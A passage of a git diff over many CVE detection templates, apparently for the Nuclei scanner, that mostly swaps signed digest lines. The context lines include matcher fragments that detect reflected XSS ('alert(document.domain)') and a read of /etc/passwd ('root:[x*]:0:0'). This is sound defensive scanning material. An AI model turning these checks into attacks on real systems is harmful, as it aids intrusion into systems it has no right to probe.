4a0a00473045022064e8a37bb7d55884147f9cbc9f03d41c71b0ba8b5e831541935dc422bbb63e08022100c1d452ae5b31610b88c2aa3b59b654804c823943e194f4369dbaec9f814aab15:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022020c5855ea9f936404f5803a43d38c610db5de15e28d60642b163befea69a1ab70221009a22140e5e2da7fe2b7183d80ca69088c6d3431570ab30ce3cc370b08795fc0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index a9fee8ae83..02e7f404ba 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -73,5 +73,4 @@ http: regex: - "(.*?)" internal: true - -# digest: 4a0a0047304502203342f697ae7155bbfb39f9a09064f7b576388b4f9643ef0411ef3ee2222c45f8022100de7b9394796c41a481264825d951d2ef8c52542b88dec3deba95f351faa94dd0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f62c6af322773cf569a6a095a4d5d9d81f91f18795ee716210eb79383794d4f30221009ce9416ef284b549ece46bd6fbd7143e7a13a4fbf4611755d55d5269632cb973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 9178e8ad43..d5f31979c1 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210099d20b612d2aea6a0d8340b04c586b94a8705e409c1fd49bbd6000282776df2b022100acbb46ba4e1efbe8e6cf18be66e1dcc23222b3bf869c78fa48d9d70a103d7bc7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210082875195d6b9a595ff2869db7dd43773c4226e15479f026f84faa3c4701685bb022100c0aca459e79aaab86b359f030b4db1169685f3cc59182583d84cca577e6add7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 013a5cc74b..4dbfce2268 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -51,5 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Batch Mint NFTs")' condition: and - -# digest: 490a0046304402206675455fec47a8333803ff4ed40c73014878caee617c6f4f008bf09ec4cbb8c902202ea03de88a43fc30d9d97f9cf73ae7815291803ddbc4881c59a27c32c9333ef3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202c91171d094d3f497b434c00becc1b1270d46b070f4f2757994667f3c38bd654022100e4ed618934d5ba20566870ee4861721477c6531625dbbc8be3252f406276ad5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 01913d9db6..a48b11d890 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "usesysid")' condition: and - -# digest: 4a0a00473045022100c1024e81de5e9f066baa4dbbb6c43d51a04e39ec6e20fb1eb23eb54e4cf4402502202d2a9bf49140c3e86f386a076ae4cbd2526e1472fd8d810580de8c83689e1cba:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a5ab5b89e092111556b59664518062b8dbc4e8274215267299d79eb693fc07102210083889565203bdb387f8208a90cf8a48120932a4a82c1206ba40ff05e5537e789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index e672a7f80b..80622f5b30 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -66,5 +66,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008d28b7571fa7ece4b7654419a981edc5831c0987a44283be10bd883749a66c890220798ac876c6634abbce4f20506d35443a70dc445ea57f8295691ce95c826aeacb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220253db936754c00dfa03faf5097411b8f4d1d343e3be2141d3ccdc57e91aa078a0221009f1653cdd5fc48fb2384c41f05887b0fc722c309b1e83fb79f0c77d65a8bd103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index acd02742b5..bf92355704 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -101,5 +101,4 @@ http: regex: - '"name":"(.*?)",' internal: true - -# digest: 4a0a00473045022045e7d670a6323fe0cb3d507a9da6f013904b531a535f17f4468ad999cccae59b022100b4034fc9e1087757531c39342ff33b19e5beafed986e504a41599e36657fc93e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220165d87f19ddef790d3a31928277b71857bd6a9d32e74abd6390cae8e1831b1af022100f8c9492045052f8b7ffffb8f82b10a6b2e714e1c3b0c6c60ce76701aa1cc9160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 3616717ae0..d24f494ea4 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c76ff6296db327803cbddc635bddbe6f51fcc5f7490b963f83b7dd0254c2868a022100873dd2c84ba9127b78cf55ea12c14fc9aee86a0cb75e6f9f7b40fa1afaeb453c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206d4f130631176bd3ede4ec0d9d9d2fecdbfe6d2b64714ad473abc2dd1e50171c02207d58e665e2cd9cc1fdb457f99d883a5e7da2c707b2fa2ee3be897addf0336102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 9f0e32c6e3..88cc3fc76d 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "")' condition: and - -# digest: 490a0046304402204b602626400e41f981d50ec8c5293616a51d8af50df2ea72209df3452f2f798a02204e00f2f8afa02910a9ce04bf6431bc3ddceb98ae615769de91e66dca4b68e119:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af4af781d52ad5bdef9247b306bea625f9885378d15dae0567ca2b741a35f7d402203ef644df4c760fef27918a3c3c731cb76968b2ccbb27b080c1410e0f9ab26d81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 242c9f6c71..b82c03df2d 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100da0609b6a5e0e6e10187c5178c2ce2177e0bb69fa3f35323389cc1cd3d729a0602204579b366302d905dd5cb539f9abbf7e72d18bda42b37b46270ae68bad6544679:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009853a6e39a79013c5fe10174499a6fba4d72a74b1a71a05f29973880ba47cc24022100de0a25ad3680d32606a7191137843da285fb5b16d6cbb98e647fff0eddd3281d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index f62c16d926..bdf4e1d3fa 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c81ad6d4b260433c89d314cf153566ea2edaaa6e977fb7452283c813692cbe8f022100a19bdae594874fe34c98f99228f4391f0cdba5b4c62ed6f66c06ed7f12827f8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d46e8c427ac9aeb874a0206d2167eb405c7c76cab3a6041a5d1c4a04001806cb022066c2bafc6fd9e857f255ee629c9700bee6d71738891282fd8d0ff31530ee693a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 73fa476dcf..29ef19e970 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009ea57b1d08f410be8c9fd77bef49de05a6b5b4a89a39e28be0f458aedc64ab44022100a6f5116b04c346c3f7966c083d2caef72cbc8648971b49186ab4b1bc17659cb4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022011105d222ac243bbc0e6a58ba505d5ba717845f40fc8a25b213f8339a2a88c2b022100f9797a18edc1d8f234647526e47699c4c48f39e8cfdeb35b10b35d21afe415dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index dcf78bf0b4..6f79731418 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207bdc3c8d78ccb49f14e4d91225d4bc3b3d3397beb85fb723989e648b4582a67e022100c60bc2396c0ce5d2944200de8ec72e294e6037c0b90067d99cca4eef9a06c5fb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b09d7de722eb7397b66c866073dd36e7c94e3d706ef65f4f81a29f9c368752ed022100a2a18e8d39399cf591300a66165d95a9a185b7a1af1e706af6a7f2a143780535:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 4e971f94df..bcc2f7467a 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e3eb4527e63bebdcae004f55101e1c4ff8731aed564c2b3183497e176d9d18e60220422df7388eac9d10e3f13b7ab6b0ff595fe5e310f28d612bd09dc322fe1373b4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9487eb96c7b87e2d9ccd3f14e4d4bc0f7a0ed79541f051988df8f491e3f34f0022100e00fd6707caaa0a7d60ba7ba690ed8f806a86615a463813dbdabbba3c6ab5ac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 3a4db31e09..d3f49ae32f 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -71,5 +71,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true - -# digest: 4a0a0047304502201de367a4ee0ee7564e845a2cf3af66725f54062de0ce841becec3d125a083e4b022100c09e1c7a930bd9b28461ad1946a2bec4c91cc8ad2dae43baffe73a3c79eb636e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220419de2fd2f6fecfa8be273b940c3a136926d0e03f315ad28313a13832f6c2c16022100b39f2e7ff6eb74920a2808cb724a694fce56ee947b31a04f8ee407daf9ad049b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 93b148ef29..ad25e65361 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -47,5 +47,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "Translation added\\\"> successfully")' condition: and - -# digest: 490a0046304402200701ec261be41c648274c5d63975ff851817b96eb189b00cac86f84426f968e00220755f2b214f77383c600aed715e78c97fea2b285f11a64be31e0a53ddccf08baa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fa61b0851862475af46bcb989c716b8ce047db5403dd32ad06b32318b2fb21650220406956561391ac6641f67fa5a0715b99aca34baccd9a48d9deb383571bf14a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index a9f8881ba4..62a7e8a1a0 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c4f9d776b16c75d72a8ba24abe5999706223fcfd54abde3d3192f2c661d3f7cd022100b57b90636f0ec41b1bab206f7363984f8f954454339efd5f7ed2303736fdf9b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207477d9d3f8a31dc698fb98d271442f15ae379a21b401f8bd523b269446287bbf022100d988178477b45ac194bab979f3627746e530b2405f1344572a19ed54ee08dd09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 618a6d8151..c183f8e717 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ere_property_gallery")' condition: and - -# digest: 490a004630440220197b18ee7645f5628df45918de5cb84c70d1b5c1aa65c4a9c3db71e9176f9a4f02206b4a6d002fb4a1b63fb0795d33508530c40308272daab657edaf325fb82d1e82:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bb9d90810bb9fc3eb94b75c81666cc73fc190e349bb1256b1cb8aa25cc91215c022100d361c6d289c4874b7e2b6b0c0f648d97c26c3d4024861042304d43ff353260b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index ce323633bd..51468f6ad5 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -46,5 +46,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")' condition: and - -# digest: 4b0a00483046022100faed764590c98602f797087886d42f798be821d24bb15760dfd8b43f98bf7e33022100cb8b1cc4abc6945217e3da00515c94cfd4051126e11ecebd4bd6eb7680288d57:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a7919233f93109393147cacdf99e5e1d4ad14b49599d388aea5f2f939e68cce02210099f388eec8b244182f6e9a840957d5fc79f402880c6f8e52f8cc3f9c60f653c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index b4e5c6993b..7fad3c5527 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -49,5 +49,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and - -# digest: 4a0a0047304502206994af1b50e75f2c0f345a4c69b1b255c0feaa474c0858b9ab03cf6cef84055c022100d67d1ca17d20c2ac9a61cd8d0bda1711fcd8eabf2c558d93896f6d0906debf7b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202df4e538fe88d31509d222cb21bc772050c39c6948bc2d970ddba727a499d551022078ca746e0284ee1f1db67ea95857a99841dbb2d0b59dcc5dc356473265d92338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 9325becc97..d7128fcb15 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -83,5 +83,4 @@ http: regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true - -# digest: 4a0a00473045022100d8926e7c6be35eeed13590e8176970ac9c3a5fe38d033d28b8e18f3c973f643702207579027fba681f90639754aaa7ed3256b21b028c712fb6caa0355951c996355f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009b16035f7eaf9b496f6accf29584d4e4019a2780b9a05b5775ac875dfafb515f022019b222ab8b3af8525bc65cd310665e647b832887c3d6e2d78290b767241f28ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index e2a7f452fb..78acc75af5 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fdb5bcfc51c7278438be8f6d0693bf168508fe63995edfcf53e9ec3a32cc12f3022100ce92a116fc609896d0088aee0bdaf2b42fc2ffc7da421b1218b3545757f0806e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100be2cfc5599f5c53f3cbe084bd96887c79ed05b07b0c93fb611a04d3978ef6d21022100dbb658550873f5a7ad93a4b02ec3e29b54db8262d1c56b96850c43afc7aff6b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 835ff689cb..03df5d429b 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022057534b9d5f5277d9d80b65bd4ed88b2f6317764260b9bf6ab0ff1deb9544bba3022100ad8afcfca615924e6935dd821289e96775c57cf2b698b8baffe8c8687a06bdd5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d3737aa26cbc38722b1462826e12940529caf917ad3b9335867fb70e8ed70b4d0220491885d1e7c2a7cb77b77d6ac74913199f60328edf90769f1ac01e70af1c498a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index ea2e984a4d..33c3e98113 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fdcfe17498f907f0366ebd1ecb9abc1a4e7538969fef84db8d60b90370a24836022100b7a828471bf3cdc9fecd01009f2eb951d33b1cedda1a251ebf138afc4d244956:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200138004f22bec488b4d363548e7224d40522aecb6d08d8bb969dc7ed9e43b2c5022100c896b3d050bed994eb8cdcd2cdea792ed22d3539fb530c82e2200abecbaae0d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 31670f099a..6ff12d1286 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 302 - -# digest: 490a0046304402200ef9c2b2a3aff8a7d9324ba54beebd8c9673d8beffa1ffad9872388eeb8d0e7402206ab840bc5a7e0371d043a41011e194e5dff9f156cc97c96781e3b230a70408be:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200ec8c57c6601073fec8b7f153ecb104d6b87e40a96fc0a5a890b0ea1bb6bae43022005a9fcb5e7a45fd2a6013c5bc1e44ab313fe08da647700de404f3e67a38976c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index d648ec1e6f..a2cb9c9a41 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -45,5 +45,4 @@ http: - "contains(location, 'login.php')" - 'contains(content_type, "text/html")' condition: and - -# digest: 4a0a0047304502206cdc907b1aa95a242630a75423e3452bc60f99c3b0a4cd9057ea0b1aa3548d01022100fa85e4ca9ec3b30c65bf7c843aee6cc1d3218ba6eaa689282a1bac37675cb90e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022074e242be5dbbb37b6bacf65a30d9e40d822a88186892e171db9f4827e3a2bd440220393f68416f8013442b01910738056da05a375c0742be52c60ba5031e499cdd0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index 77568297be..d958b0b930 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -61,5 +61,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and - -# digest: 4a0a00473045022012a66ebfa7d3cae3f75f4ff5aa61ceab07157174bd8ded2cb39a9091dfb2bcd402210096726798803617815af9a8a1734ad32b6cb95fdb605ed3934446947c56506777:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022032baa6254125f780cfe368d6ce641c38b76e52274fc7991d4ff1636ffd8a1e70022100f2c5ceccdae88d361a0af9aaafa9b241758992112e7cdded80f0697a3ba3be73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 4dc5cada48..ad12f7faba 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 301 - -# digest: 490a00463044022026e937006cefe57be87d7f540df10abf16654a2ac3eed7d25d2bf8af3f43ab2402207edda0dcf324bf80f8b2e2691e66e824adec5cd3543e5c7ee6dc34e1f781359b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038ed174cbd4821e795b52169d1746b2a587f0e57897108cdcbf351d8e22e391e02207a83496033939fc34c46bacea1e17db4051a7cd3609e23a1b1599838d1133f41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 7e8bc1149a..5f0971a069 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -81,5 +81,4 @@ http: regex: - 'type="hidden" value="(.*?)">' internal: true - -# digest: 490a0046304402204c0257e89ef6d1ee7f68ddc2f93501babd5ff96ea2b5594a276b5a4c13da553f0220324560bdf69ae4b1fc774e9dfc2f913a87efbee3f2f9cf0d3970aee631fc3bea:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100aa0eb23f5220b702777b6c1cd03378e0fae22ef4fd0cf22a7ae043f4d63c8911022100b954184dfed2f950ab79b6e309863db98cefc0609066005aa6123b93aae07803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 1c121cb1e3..ed5f6020c1 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100da20bc4cc79951c475cdedaf00dea9624ce4ca10313d55639ca812f934245ec402206961f3df16a8e2b38666435ca7f90194c160e92c78c08d9780aa2c65e742f281:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b9e77bbf2cac467fe5e0750797d8dfc7ec2576a6fd4da1f9416d251f73e6d62022100932e141fe85b923524e1721b7b58a736157ac9c8de69c8ca2a726dd407b2c104:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 7f1ecd7e6b..a3275d2a05 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -64,5 +64,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true - -# digest: 4a0a0047304502204097a0a046b48696c5eaa18d8e3520e3c133bd319465bc5ddb1ddef12f4276ec022100e02c765711d8717b7f461ac0a7ca493a9efe3fda49a041be7da5f70736608c67:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b78e00a7b6a854e9a01d8a2325aa111bcf3bcd11da03e3c795c8187396f5570a022100d7b2e64f5636fc126ebc4fed0a0b078f658d74d6dca8394e8e6bf7d1a5b56d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index efbdf7b4b0..f2bd3a3c79 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and - -# digest: 4b0a00483046022100e8ace2513ffcba00b1f994d25e7346fc84e19c84293f945c83a76300072d26f4022100f9d469f26de8ab5178a8b93808055f2cda029dd5ca2b4d7830a894ead2bd4f74:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0ce410307d21ec5095ee10a45bfe2ba3200cfcfa821423c41001ce2974eaddb02201c5ba6b5dbf3b75086918358b12d23d78c809707070927901bce582c715a89c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 93382c6288..76edc2dd30 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d0f325a1a629df067a63b5ea4ea9ac3c3cf032aef7cf31bae3d2d37b9a3a57aa02205990793e35f64490356da4bf6aa6f858b9704b4fdd6087e15a4320e1ec0d0a25:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c1109ce36c9b10abded358a892798f6fbaf0b8d32d6b7c24e6086ffa29c2cb500220034dccbe9b6c84ab8d4cf8ebb96771c9394ba27990af712fa767fc312bb9306e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index ad6f97747e..5638788cf9 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -45,5 +45,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and - -# digest: 490a0046304402201f58f95e0892a5f91f50a72ab653a33e1a5367a7b4275a047699f0d5b4b3c9ae02205f162ac225da2876984d105bae1a8923bda35e5a090d24cc42fb27e5fba4d7f6:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220630e3124e930f525b8aecd964850214fdc225f75478cf3336192d74a9fbb2ad302206a159298841b899e4210dd34be4061cfd3f83e1b9274e0b4c7fb4b9c0e7d1abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 912c752c79..061090e922 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022033ce5b34d04e85ed3c2486becca562ba3f53f44e822fd3e53e385012369047fe022100b4650519fc74b05c17a9e80dc6506f4aca6ab1d7eec164d39f7f8d41f7bf4a6c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220064d15f931fc2ec8a97404a5c9016c534ab731b9ce8a3bbc1e7acf29b1c4e02b0220077a2e72d88eaf3e26d9343044e96e713769b9975123e83476008f25221f4046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 697a2450f1..8ba87ff2ec 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022022881abb092e2c0886bbd5b1792c5bbb189e0a6c88d024f184d9e23452da21c1022004e9b80b91730b8a575a23a4ab10c591a9e62b7ae42f80c32bb753d66d010254:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022029d5489fd5ecd1ea2974a58b697a5dcdbe60c525062cc3391fc0f2b4361a34fb0221009827754222a05375422210240f2f7d9a67a24d99540148f3101d44952a5b0072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index beff1ef380..98ab3d8070 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -38,5 +38,4 @@ http: - type: regex regex: - "root:[x*]:0:0" - -# digest: 4a0a0047304502203f2b100548aed2ef32b2ea559920a11beaf66a7d50748e808330f9b851da6120022100f5fd10fe6ebb26959974c2723228c51bf3148113ae4e280e2a1d0f1df70a6479:922c64590222798bb761d5b6d8e72950 +# digest: 